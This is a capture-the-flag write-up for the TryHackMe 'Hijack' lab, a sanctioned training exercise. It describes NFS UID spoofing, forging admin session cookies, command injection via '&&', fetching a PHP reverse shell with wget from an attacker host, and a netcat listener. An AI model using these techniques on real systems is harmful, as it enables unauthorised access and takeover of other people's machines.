TryHackMe - Hijack Writeup

"Misconfigs conquered, identities claimed."

Link to Try Hack Me room

This may be listed as an easy machine, but it's not that easy.

You will need:-

  • To think out of the box
  • Patience
  • Familiarity with Burp Suite or OWASP ZAP
  • Web application testing skills

Nmap

Initial Nmap scanning shows us 4 open ports:-

  • 21 - FTP
  • 22 -ssh
  • 80 - HTTP
  • 111 - NFS

Getting the user flag

Starting off, the webpage has:-

  • A login page
  • A sign up page
  • Administration page which can only be accessed by the admin
  • A home page

There is nothing interesting here, except that the login page is improperly configured, through which we find out that the user "admin" exists.

This will come in handy later on.

Brute forcing the login page is a rabbit hole as it implements rate limiting which will lock out an account after 5 incorrect login attempts.

Moving on to NFS, we can find the name of the NFS share by running:-

showmount -e <TARGET-IP>

Prior to mounting, we need to edit the fstab file to specify the mount point and IP.

And then we can create the directory, and mount the share to it.

As you can see, we can't access the directory, but a user with the UID "1003" will be able to.

So it's time to create another user.

And we can modify the UID from /etc/passwd.

After switching to the user we created, we find a file called for_employees.txt, which contains FTP credentials.

Now we can access the machine via FTP and get 2 files located there:-

  • .from_admin.txt
  • .passwords_list.txt

The .from_admin.txt file reveals a username "rick", and confirms to us that the user "admin" does in fact use one of the passwords in the .passwords_list.txt file.

Before you get excited and attempt to brute force the login page again, just remember that it implements rate limiting.

After messing around with the website, I decided to create an account and login, after which I discovered a PHPSESSID in the browser storage.

Plugging this into CyberChef, we discover that it is in the format of "user:password", and it has been URL encoded and formatted as Base64.

But what about the password?

Using hash-identifier, we discover that it is an MD5 hash.

So, now we have a detailed idea of how we can exploit this.. session hijacking!

I created a short bash script to transform the passwords in the .passwords_list.txt file by:-

  • Hashing each password to MD5
  • Then prepending "admin:" to each password

Of course, we won't be able to manually test each PHPSESSID we have generated, and we also need to encode each PHPSESSID, and this is where Burp Suite comes in handy.

First, let's capture a request to access the /administration.php page.

Then, we load the PHPSESSIDs we generated with the bash script as a payload.

And finally, we add some pre-processors to encode each PHPSESSID.

After a while, we can see that one of the requests returns a different length in the response, and taking a look at the response we see that it worked!

So, we can take that PHPSESSID and replace it in our browser.

Now we get access to the administration panel, through which we can check the status of services running on the machine.

After tinkering with the input for a while, I discovered that we can inject commands by prepending "&&" to our input.

For example:-

&& ls

You can see where this is going..

On my machine, I set up a php reverse shell from pentestmonkey.

Next, I started a Python HTTP server:-

python3 -m http.server

And used this command to get the reverse shell onto the target machine:-

wget http://ATTACKER-IP:PORT/php-reverse-shell.php

Sanity check to ensure the reverse shell was uploaded:

Next, all we have to do is set up a netcat llistener:-

nc -lvnp <PORT>

And visit http://TARGET-IP/php-reverse-shell.php

Before moving on, we need to upgrade our shell to an interactive tty, you can follow this guide.

After checking out the /var/www/html directory, we find the password for the user "rick" in config.php

And after switching to rick, we get the user flag in /home/rick/user.txt.

Getting the root flag

Now the hard part is over.. trust me.

Time for privilege escalation.

We check what rick can run with sudo:

And after a bit of research, we find this article from HackTricks.

So, all we have to do to become root is:-

  • Create the C script on our machine
  • Use a Python HTTP server and wget to transfer it to the target machine
  • Compile the C file
  • And finally, execute it with the command we get from sudo -l

And that's it! The root flag is at /root/root.txt

Copy link
Related articles